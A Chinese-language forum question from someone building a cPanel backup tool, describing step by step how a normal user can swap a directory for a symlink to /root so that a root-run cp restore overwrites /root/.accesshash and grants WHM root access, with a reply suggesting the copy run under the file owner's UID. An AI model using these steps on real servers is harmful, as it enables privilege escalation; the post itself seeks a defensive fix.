cp/rsync 命令,目标为目录的符号链接

cp/rsync 命令,目标为目录的符号链接

我目前正在研究 cPanel 备份解决方案。我们现在已获悉此漏洞。

漏洞:获得服务器的完全 ROOT 访问权限

1.)从普通用户账户创建恶意文件:

mkdir root
echo "hello" > root/.accesshash

2.) 等待备份运行

3.) 用符号链接替换 ​​root:

ln -s /root root

4.) 恢复 root/.accesshash(我以 root 身份运行此命令:“cp -rf /backup/.accesshash /home/username/root/”)

5.) 用户现在拥有 root 访问权限,因为我们覆盖了 /root/.accesshash。攻击者可以通过将访问哈希放入此文件中,以 root 身份登录 WHM。

root@cpanel [/home/master]# cat /root/.accesshash
hello
root@cpanel [/home/master]# ls -l /root/.accesshash
-rw-r--r-- 1 master master 3 Nov 20 21:41 /root/.accesshash
root@cpanel [/home/master]#

有人能建议我解决这个问题吗?提前谢谢。

答案1

我会确保备份文件所属用户可以访问,并以此用户的 UID 启动复制/rsync。这样,cp/rsync 将无法跟踪符号链接并写入/root

相关内容